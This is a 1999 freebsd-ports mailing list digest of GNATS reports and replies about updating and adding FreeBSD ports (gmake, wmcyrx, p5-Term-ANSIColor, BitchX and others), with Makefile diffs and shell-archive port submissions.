(envelope-from nakai@FreeBSD.org) Date: Wed, 1 Dec 1999 01:39:15 -0800 (PST) From: Message-Id: <199912010939.BAA04184@freefall.freebsd.org> To: nakai@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15122: Update math/gnumeric to 0.44 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update math/gnumeric to 0.44 Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: nakai Responsible-Changed-When: Wed Dec 1 01:38:54 PST 1999 Responsible-Changed-Why: I'll handle this... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 1:40: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5E28D14EE9 for ; Wed, 1 Dec 1999 01:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA04270; Wed, 1 Dec 1999 01:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C893B14D5D; Wed, 1 Dec 1999 01:32:47 -0800 (PST) Message-Id: <19991201093247.C893B14D5D@hub.freebsd.org> Date: Wed, 1 Dec 1999 01:32:47 -0800 (PST) From: wolman@cs.washington.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15201: upgrade of gnu make port from version 3.77 to 3.78.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15201 >Category: ports >Synopsis: upgrade of gnu make port from version 3.77 to 3.78.1 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 01:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alec Wolman >Release: 3.3 >Organization: UW, CSE Department >Environment: n/a >Description: The following patch upgrades the gnu make port from version 3.77 to version 3.78.1. Note that two of the files, patches/patch-aa and patches/patch-ab are no longer needed. You can download the patch from http://www.cs.washington.edu/homes/wolman/patches/gmake.patch >How-To-Repeat: n/a >Fix: n/a >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 1:47: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CA16114D33; Wed, 1 Dec 1999 01:47:02 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA05053; Wed, 1 Dec 1999 01:47:02 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Wed, 1 Dec 1999 01:47:02 -0800 (PST) From: Message-Id: <199912010947.BAA05053@freefall.freebsd.org> To: lioux@linf.unb.br, nakai@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15145: emulator/vgb port with incomplete PLIST Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: emulator/vgb port with incomplete PLIST State-Changed-From-To: open->closed State-Changed-By: nakai State-Changed-When: Wed Dec 1 01:46:40 PST 1999 State-Changed-Why: Fix commited, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 1:58:53 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2339414F36; Wed, 1 Dec 1999 01:58:52 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA06015; Wed, 1 Dec 1999 01:58:52 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Wed, 1 Dec 1999 01:58:52 -0800 (PST) From: Message-Id: <199912010958.BAA06015@freefall.freebsd.org> To: nakai@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/14906: Update devel/glade to 0.5.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update devel/glade to 0.5.5 Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: nakai Responsible-Changed-When: Wed Dec 1 01:54:54 PST 1999 Responsible-Changed-Why: I'll handle this. Does the MAINTAINER Dom Mitchell really no response? He seems to be have several ports maintainership. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 5:40:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 06E5F14D40 for ; Wed, 1 Dec 1999 05:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA00965; Wed, 1 Dec 1999 05:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id BAA1C14BC3; Wed, 1 Dec 1999 02:35:37 -0800 (PST) Message-Id: <19991201103537.BAA1C14BC3@hub.freebsd.org> Date: Wed, 1 Dec 1999 02:35:37 -0800 (PST) From: ozz@FreeBSD.org.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15202: update russian/wmcyrx from 2.0 to 2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15202 >Category: ports >Synopsis: update russian/wmcyrx from 2.0 to 2.1 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 05:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Osokin Sergey >Release: 3.3-STABLE >Organization: http://www.freebsd.org.ru >Environment: FreeBSD 3.3-STABLE #0: Mon Nov 29 19:04:43 MSK 1999 >Description: update russian/wmcyrx from 2.0 to 2.1 >How-To-Repeat: >Fix: diff -ruN wmcyrx-old/Makefile wmcyrx/Makefile --- wmcyrx-old/Makefile Tue Aug 31 05:47:04 1999 +++ wmcyrx/Makefile Wed Dec 1 13:30:52 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: CyrX-2 -# Version required: 2.0 +# Version required: 2.1 # Date created: 04 Janyary 1999 # Whom: Sergey Osokin aka oZZ # # $FreeBSD: ports/russian/wmcyrx/Makefile,v 1.2 1999/08/31 01:47:04 peter Exp $ # -DISTNAME= cyrx2.0 -PKGNAME= ru-wmcyrx-2.0 +DISTNAME= cyrx-2.1 +PKGNAME= ru-wmcyrx-2.1 CATEGORIES= russian windowmaker MASTER_SITES= http://yard.hitech.mipt.ru/~mini/distrib/ @@ -15,8 +15,7 @@ LIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm -WRKSRC= ${WRKDIR}/cyrx-2.0 -#NO_INSTALL_MANPAGES= yes +NO_INSTALL_MANPAGES= yes post-extract: @ ${MV} ${WRKSRC}/makefile ${WRKSRC}/Makefile diff -ruN wmcyrx-old/files/md5 wmcyrx/files/md5 --- wmcyrx-old/files/md5 Fri Sep 10 23:07:56 1999 +++ wmcyrx/files/md5 Wed Dec 1 13:08:45 1999 @@ -1 +1 @@ -MD5 (cyrx2.0.tar.gz) = 17d75fa8804f83611dab37367f6c7b74 +MD5 (cyrx-2.1.tar.gz) = c93b6fc8810bf3249684944d3dd58fd4 diff -ruN wmcyrx-old/patches/patch-aa wmcyrx/patches/patch-aa --- wmcyrx-old/patches/patch-aa Fri Sep 10 23:07:56 1999 +++ wmcyrx/patches/patch-aa Wed Dec 1 13:26:26 1999 @@ -1,25 +1,17 @@ ---- Makefile.orig Sun Oct 18 23:17:44 1998 -+++ Makefile Fri Feb 12 21:55:45 1999 -@@ -1,10 +1,10 @@ +--- Makefile.orig Wed Apr 28 19:17:54 1999 ++++ Makefile Wed Dec 1 13:22:49 1999 +@@ -1,11 +1,11 @@ -I = -I/usr/openwin/include -I/usr/local/include -+I = -I${X11BASE}/include -I${LOCALBASE}/include -I/usr/include ++I = -I${X11BASE}/include -I${LOCALBASE}/include #L = -Bstatic -lXpm -Bdynamic -lX11 -lXext --L = -L/usr/local/lib -L/usr/openwin/lib -lXpm -lX11 -lXext +-L = -L/usr/local/lib -L/usr/openwin/lib -L/usr/X11/lib -lXpm -lX11 -lXext +L = -L${LOCALBASE}/lib -L${X11BASE}/lib -L/usr/lib -lXpm -lX11 -lXext - CC = gcc -O $I -DXLIB_ILLEGAL_ACCESS + #CC = gcc -O $I -DXLIB_ILLEGAL_ACCESS + CC=CC -O $I -DXLIB_ILLEGAL_ACCESS -cyrx2: cyrx2.o cyrmapper.o +all: cyrx2.o cyrmapper.o $(CC) cyrx2.o cyrmapper.o -o cyrx2 $L cyrx: cyrx.o cyrmapper.o -@@ -35,7 +35,5 @@ - cat cyrsym.h | xtowin | gen > msw.h - - clean: -- rm *.o cyrx2 -- -- -+ rm -rf *.o cyrx2 - >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 5:40:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4BCD214D5D for ; Wed, 1 Dec 1999 05:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA00974; Wed, 1 Dec 1999 05:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from neva.vlink.ru (neva.vlink.ru [195.9.70.8]) by hub.freebsd.org (Postfix) with ESMTP id 63C7E14F80 for ; Wed, 1 Dec 1999 02:51:34 -0800 (PST) (envelope-from dsh@neva.vlink.ru) Received: by neva.vlink.ru (Postfix, from userid 1000) id 62FE83C0A; Wed, 1 Dec 1999 13:51:29 +0300 (MSK) Message-Id: <19991201105129.62FE83C0A@neva.vlink.ru> Date: Wed, 1 Dec 1999 13:51:29 +0300 (MSK) From: dsh@neva.vlink.ru Reply-To: dsh@neva.vlink.ru To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15203: New FreeBSD port: p5-Term-ANSIColor Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15203 >Category: ports >Synopsis: New FreeBSD port: p5-Term-ANSIColor >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 05:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Denis Shaposhnikov >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: >Description: While ANSI color escape codes are fairly simple, it can be hard to remember the codes for all of the attributes and the code resulting from hard-coding them into your script is definitely difficult to read. This module is designed to fix those problems, as well as provide a convenient interface to do a few things for you automatically (like resetting attributes after the text you print out so that you don't accidentally leave attributes set). Despite its name, this module can also handle non-color ANSI text attributes (bold, underline, reverse video, and blink). It uses either of two interfaces, one of which uses "constants" for each different attribute and the other of which uses two subs which take strings of attributes as arguments. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # p5-Term-ANSIColor/ # p5-Term-ANSIColor/files # p5-Term-ANSIColor/files/md5 # p5-Term-ANSIColor/pkg # p5-Term-ANSIColor/pkg/COMMENT # p5-Term-ANSIColor/pkg/DESCR # p5-Term-ANSIColor/pkg/PLIST # p5-Term-ANSIColor/Makefile # echo c - p5-Term-ANSIColor/ mkdir -p p5-Term-ANSIColor/ > /dev/null 2>&1 echo c - p5-Term-ANSIColor/files mkdir -p p5-Term-ANSIColor/files > /dev/null 2>&1 echo x - p5-Term-ANSIColor/files/md5 sed 's/^X//' >p5-Term-ANSIColor/files/md5 << 'END-of-p5-Term-ANSIColor/files/md5' XMD5 (ANSIColor-1.01.tar.gz) = e499734e8d1709ae093187eb93ed5bc1 END-of-p5-Term-ANSIColor/files/md5 echo c - p5-Term-ANSIColor/pkg mkdir -p p5-Term-ANSIColor/pkg > /dev/null 2>&1 echo x - p5-Term-ANSIColor/pkg/COMMENT sed 's/^X//' >p5-Term-ANSIColor/pkg/COMMENT << 'END-of-p5-Term-ANSIColor/pkg/COMMENT' XColor screen output using ANSI escape sequences. END-of-p5-Term-ANSIColor/pkg/COMMENT echo x - p5-Term-ANSIColor/pkg/DESCR sed 's/^X//' >p5-Term-ANSIColor/pkg/DESCR << 'END-of-p5-Term-ANSIColor/pkg/DESCR' XWhile ANSI color escape codes are fairly simple, it can be hard to Xremember the codes for all of the attributes and the code resulting Xfrom hard-coding them into your script is definitely difficult to Xread. This module is designed to fix those problems, as well as Xprovide a convenient interface to do a few things for you Xautomatically (like resetting attributes after the text you print out Xso that you don't accidentally leave attributes set). X XDespite its name, this module can also handle non-color ANSI text Xattributes (bold, underline, reverse video, and blink). It uses either Xof two interfaces, one of which uses "constants" for each different Xattribute and the other of which uses two subs which take strings of Xattributes as arguments. X X-- Denis Shaposhnikov Xdsh@vlink.ru END-of-p5-Term-ANSIColor/pkg/DESCR echo x - p5-Term-ANSIColor/pkg/PLIST sed 's/^X//' >p5-Term-ANSIColor/pkg/PLIST << 'END-of-p5-Term-ANSIColor/pkg/PLIST' Xlib/perl5/site_perl/%%PERL_VER%%/Term/ANSIColor.pm Xlib/perl5/site_perl/%%PERL_VER%%/%%PERL_ARCH%%/auto/Term/ANSIColor/.packlist X@dirrm lib/perl5/site_perl/%%PERL_VER%%/%%PERL_ARCH%%/auto/Term/ANSIColor END-of-p5-Term-ANSIColor/pkg/PLIST echo x - p5-Term-ANSIColor/Makefile sed 's/^X//' >p5-Term-ANSIColor/Makefile << 'END-of-p5-Term-ANSIColor/Makefile' X# New ports collection makefile for: ANSIColor X# Version required: 1.01 X# Date created: 1 December 1999 X# Whom: Denis Shaposhnikov X# X# $Id$ X# X XDISTNAME= ANSIColor-1.01 XPKGNAME= p5-Term-ANSIColor-1.01 XCATEGORIES= devel perl5 XMASTER_SITES= ${MASTER_SITE_PERL_CPAN} XMASTER_SITE_SUBDIR= Term X XMAINTAINER= dsh@vlink.ru X XUSE_PERL5= YES XCONFIGURE_ARGS= PREFIX=${PREFIX} X XMAN3= Term::ANSIColor.3 XMAN3PREFIX= ${PREFIX}/lib/perl5/${PERL_VERSION} X Xdo-configure: X @ cd ${WRKSRC}; ${SETENV} ${CONFIGURE_ENV} ${PERL5} Makefile.PL ${CONFIGURE_ARGS} X X.include END-of-p5-Term-ANSIColor/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 7: 0: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 704) id 8903514D37; Wed, 1 Dec 1999 07:00:00 -0800 (PST) To: wolman@cs.washington.edu, jseger@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG From: jseger@FreeBSD.ORG Subject: Re: ports/15201 Message-Id: <19991201150000.8903514D37@hub.freebsd.org> Date: Wed, 1 Dec 1999 07:00:00 -0800 (PST) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: upgrade of gnu make port from version 3.77 to 3.78.1 State-Changed-From-To: open->closed State-Changed-By: jseger State-Changed-When: Wed Dec 1 06:59:02 PST 1999 State-Changed-Why: I just upgraded the port to gmake 3.78.1 myself. After doing so, I took a look at your patches. They work, however they split the info files into many files instead of the one large file. That's why we have patch-aa. Anyway, thanks for your submission. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 7:53:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 704) id 4F1E215018; Wed, 1 Dec 1999 07:53:36 -0800 (PST) To: maurice@atum.castro.aus.net, jseger@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG From: jseger@FreeBSD.ORG Subject: Re: ports/15179 Message-Id: <19991201155336.4F1E215018@hub.freebsd.org> Date: Wed, 1 Dec 1999 07:53:36 -0800 (PST) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New Port - comms package for Psion palm top State-Changed-From-To: open->closed State-Changed-By: jseger State-Changed-When: Wed Dec 1 07:53:23 PST 1999 State-Changed-Why: Superceded by ports/15181 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 8: 1: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8CB1F14D33; Wed, 1 Dec 1999 08:00:56 -0800 (PST) (envelope-from dirk@FreeBSD.org) Received: (from dirk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA68322; Wed, 1 Dec 1999 08:00:56 -0800 (PST) (envelope-from dirk@FreeBSD.org) Date: Wed, 1 Dec 1999 08:00:56 -0800 (PST) From: Message-Id: <199912011600.IAA68322@freefall.freebsd.org> To: dirk@FreeBSD.org, freebsd-ports@FreeBSD.org, dirk@FreeBSD.org Subject: Re: misc/15128: Php4 beta 3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Php4 beta 3 Responsible-Changed-From-To: freebsd-ports->dirk Responsible-Changed-By: dirk Responsible-Changed-When: Wed Dec 1 08:00:23 PST 1999 Responsible-Changed-Why: Over to maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 8: 5:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AF80E14D78; Wed, 1 Dec 1999 08:05:46 -0800 (PST) (envelope-from dirk@FreeBSD.org) Received: (from dirk@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA68979; Wed, 1 Dec 1999 08:05:40 -0800 (PST) (envelope-from dirk@FreeBSD.org) Date: Wed, 1 Dec 1999 08:05:40 -0800 (PST) From: Message-Id: <199912011605.IAA68979@freefall.freebsd.org> To: dirk@FreeBSD.org, freebsd-ports@FreeBSD.org, rse@FreeBSD.org Subject: Re: ports/15123: www/apache13-modssl has PREFIX problems finding OpenSSL Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: www/apache13-modssl has PREFIX problems finding OpenSSL Responsible-Changed-From-To: freebsd-ports->rse Responsible-Changed-By: dirk Responsible-Changed-When: Wed Dec 1 08:05:22 PST 1999 Responsible-Changed-Why: Over to port maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 9: 1:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2668415B16 for ; Wed, 1 Dec 1999 09:01:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA74034; Wed, 1 Dec 1999 09:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from norrgarden1.norrgarden.se (norrgarden1.norrgarden.se [195.100.133.214]) by hub.freebsd.org (Postfix) with ESMTP id AFB0014DCB for ; Wed, 1 Dec 1999 08:52:21 -0800 (PST) (envelope-from cj@norrgarden1.norrgarden.se) Received: (from root@localhost) by norrgarden1.norrgarden.se (8.9.3/8.9.3) id RAA24229; Wed, 1 Dec 1999 17:51:23 +0100 (CET) (envelope-from cj) Message-Id: <199912011651.RAA24229@norrgarden1.norrgarden.se> Date: Wed, 1 Dec 1999 17:51:23 +0100 (CET) From: calle.madestrand@norrgarden.se Reply-To: calle.madestrand@norrgarden.se To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15209: BitchX 1.0 port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15209 >Category: ports >Synopsis: BitchX 1.0 IRC client port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 09:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Carl Johan Madestrand >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: >Description: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # /usr/ports/irc/bitchx-1.0/ # /usr/ports/irc/bitchx-1.0/pkg # /usr/ports/irc/bitchx-1.0/pkg/DESCR # /usr/ports/irc/bitchx-1.0/pkg/PLIST # /usr/ports/irc/bitchx-1.0/pkg/COMMENT # /usr/ports/irc/bitchx-1.0/patches # /usr/ports/irc/bitchx-1.0/patches/patch-aa # /usr/ports/irc/bitchx-1.0/files # /usr/ports/irc/bitchx-1.0/files/md5 # /usr/ports/irc/bitchx-1.0/Makefile # echo c - /usr/ports/irc/bitchx-1.0/ mkdir -p /usr/ports/irc/bitchx-1.0/ > /dev/null 2>&1 echo c - /usr/ports/irc/bitchx-1.0/pkg mkdir -p /usr/ports/irc/bitchx-1.0/pkg > /dev/null 2>&1 echo x - /usr/ports/irc/bitchx-1.0/pkg/DESCR sed 's/^X//' >/usr/ports/irc/bitchx-1.0/pkg/DESCR << 'END-of-/usr/ports/irc/bitchx-1.0/pkg/DESCR' XBitchX is an enhanced ircII client. It includes many built-in features Xnormally found only in scripts. Including, full ANSI color, userlists, Xflood protection, and built CDCC (XDCC) file offering. X Xhttp://www.bitchx.org X X- LoRd_CJ X calle.madestrand@norrgarden.se END-of-/usr/ports/irc/bitchx-1.0/pkg/DESCR echo x - /usr/ports/irc/bitchx-1.0/pkg/PLIST sed 's/^X//' >/usr/ports/irc/bitchx-1.0/pkg/PLIST << 'END-of-/usr/ports/irc/bitchx-1.0/pkg/PLIST' Xbin/BitchX Xbin/scr-bx Xbin/wserv Xlib/bx/BitchX.help Xlib/bx/BitchX.quit Xlib/bx/BitchX.reasons X@dirrm lib/bxEND-of-/root/bitchx-1.0/pkg/PLIST Xecho x - /root/bitchx-1.0/pkg/COMMENT Xsed 's/^X//' >/root/bitchx-1.0/pkg/COMMENT << 'END-of-/root/bitchx-1.0/pkg/COMMENT' XAn alternative ircII color client XEND-of-/root/bitchx-1.0/pkg/COMMENT Xecho c - /root/bitchx-1.0/files Xmkdir -p /root/bitchx-1.0/files > /dev/null 2>&1 Xecho x - /root/bitchx-1.0/files/md5 Xsed 's/^X//' >/root/bitchx-1.0/files/md5 << 'END-of-/root/bitchx-1.0/files/md5' XMD5 (BitchX-1.0c12.tar.gz) = 75af2dbd07da5d68230e09bb52185ea4 XEND-of-/root/bitchx-1.0/files/md5 Xecho x - /root/bitchx-1.0/Makefile Xsed 's/^X//' >/root/bitchx-1.0/Makefile << 'END-of-/root/bitchx-1.0/Makefile' X# New ports collection makefile for: BitchX ircII client X# Version required: 1.0c12 X# Date created: 1 December 1999 X# Whom: LoRd_CJ X# X# $FreeBSD$ X XDISTNAME= BitchX-1.0c12 XPKGNAME= bitchx-1.0 XCATEGORIES= irc XMASTER_SITES= ftp://ftp.bitchx.com/pub/ \ X ftp://bitchx.dimension6.com/pub/ X XMAINTAINER= calle.madestrand@norrgarden.se X XWRKSRC= ${WRKDIR}/BitchX X Xpre-patch: X @${CP} ${WRKSRC}/source/irc.c ${WRKSRC} X XGNU_CONFIGURE= yes XUSE_GMAKE= yes XCONFIGURE_ARGS= \ X --with-plugins \ X XMAN1= bitchx.1 XMANCOMPRESSED= yes X Xdo-install: X ${MKDIR} ${PREFIX}/lib/bx X ${INSTALL_PROGRAM} ${WRKSRC}/source/BitchX ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/source/wserv ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/source/scr-bx ${PREFIX}/bin X ${INSTALL_DATA} ${WRKSRC}/BitchX.help ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.quit ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.reasons ${PREFIX}/lib/bx X ${INSTALL_MAN} ${WRKSRC}/doc/bitchx.1.gz ${PREFIX}/man/man1 X X.include XEND-of-/root/bitchx-1.0/Makefile Xecho c - /root/bitchx-1.0/patches Xmkdir -p /root/bitchx-1.0/patches > /dev/null 2>&1 Xecho x - /root/bitchx-1.0/patches/patch-aa Xsed 's/^X//' >/root/bitchx-1.0/patches/patch-aa << 'END-of-/root/bitchx-1.0/patches/patch-aa' X*** source/irc.c.orig Wed Dec 1 15:52:44 1999 X--- source/irc.c Wed Dec 1 15:53:04 1999 X*************** X*** 457,463 **** X #if defined(WANT_DETACH) && !defined(GUI) X kill_attached_if_needed(0); X #endif X- current_ftarget = stdout; X charset_lat1(); X fprintf(stdout, "\r"); X fflush(stdout); X--- 457,462 ---- XEND-of-/root/bitchx-1.0/patches/patch-aa Xexit X END-of-/usr/ports/irc/bitchx-1.0/pkg/PLIST echo x - /usr/ports/irc/bitchx-1.0/pkg/COMMENT sed 's/^X//' >/usr/ports/irc/bitchx-1.0/pkg/COMMENT << 'END-of-/usr/ports/irc/bitchx-1.0/pkg/COMMENT' XAn alternative ircII color client END-of-/usr/ports/irc/bitchx-1.0/pkg/COMMENT echo c - /usr/ports/irc/bitchx-1.0/patches mkdir -p /usr/ports/irc/bitchx-1.0/patches > /dev/null 2>&1 echo x - /usr/ports/irc/bitchx-1.0/patches/patch-aa sed 's/^X//' >/usr/ports/irc/bitchx-1.0/patches/patch-aa << 'END-of-/usr/ports/irc/bitchx-1.0/patches/patch-aa' X*** source/irc.c.orig Wed Dec 1 15:52:44 1999 X--- source/irc.c Wed Dec 1 15:53:04 1999 X*************** X*** 457,463 **** X #if defined(WANT_DETACH) && !defined(GUI) X kill_attached_if_needed(0); X #endif X- current_ftarget = stdout; X charset_lat1(); X fprintf(stdout, "\r"); X fflush(stdout); X--- 457,462 ---- END-of-/usr/ports/irc/bitchx-1.0/patches/patch-aa echo c - /usr/ports/irc/bitchx-1.0/files mkdir -p /usr/ports/irc/bitchx-1.0/files > /dev/null 2>&1 echo x - /usr/ports/irc/bitchx-1.0/files/md5 sed 's/^X//' >/usr/ports/irc/bitchx-1.0/files/md5 << 'END-of-/usr/ports/irc/bitchx-1.0/files/md5' XMD5 (BitchX-1.0c12.tar.gz) = 75af2dbd07da5d68230e09bb52185ea4 END-of-/usr/ports/irc/bitchx-1.0/files/md5 echo x - /usr/ports/irc/bitchx-1.0/Makefile sed 's/^X//' >/usr/ports/irc/bitchx-1.0/Makefile << 'END-of-/usr/ports/irc/bitchx-1.0/Makefile' X# New ports collection makefile for: BitchX ircII client X# Version required: 1.0c12 X# Date created: 1 December 1999 X# Whom: LoRd_CJ X# X# $FreeBSD$ X XDISTNAME= BitchX-1.0c12 XPKGNAME= bitchx-1.0 XCATEGORIES= irc XMASTER_SITES= ftp://ftp.bitchx.com/pub/ \ X ftp://bitchx.dimension6.com/pub/ X XMAINTAINER= calle.madestrand@norrgarden.se X XWRKSRC= ${WRKDIR}/BitchX X Xpre-patch: X @${CP} ${WRKSRC}/source/irc.c ${WRKSRC} X XGNU_CONFIGURE= yes XUSE_GMAKE= yes XCONFIGURE_ARGS= \ X --with-plugins \ X XMAN1= bitchx.1 XMANCOMPRESSED= yes X Xdo-install: X ${MKDIR} ${PREFIX}/lib/bx X ${INSTALL_PROGRAM} ${WRKSRC}/source/BitchX ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/source/wserv ${PREFIX}/bin X ${INSTALL_PROGRAM} ${WRKSRC}/source/scr-bx ${PREFIX}/bin X ${INSTALL_DATA} ${WRKSRC}/BitchX.help ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.quit ${PREFIX}/lib/bx X ${INSTALL_DATA} ${WRKSRC}/BitchX.reasons ${PREFIX}/lib/bx X ${INSTALL_MAN} ${WRKSRC}/doc/bitchx.1.gz ${PREFIX}/man/man1 X X.include END-of-/usr/ports/irc/bitchx-1.0/Makefile exit >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 9:26:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from 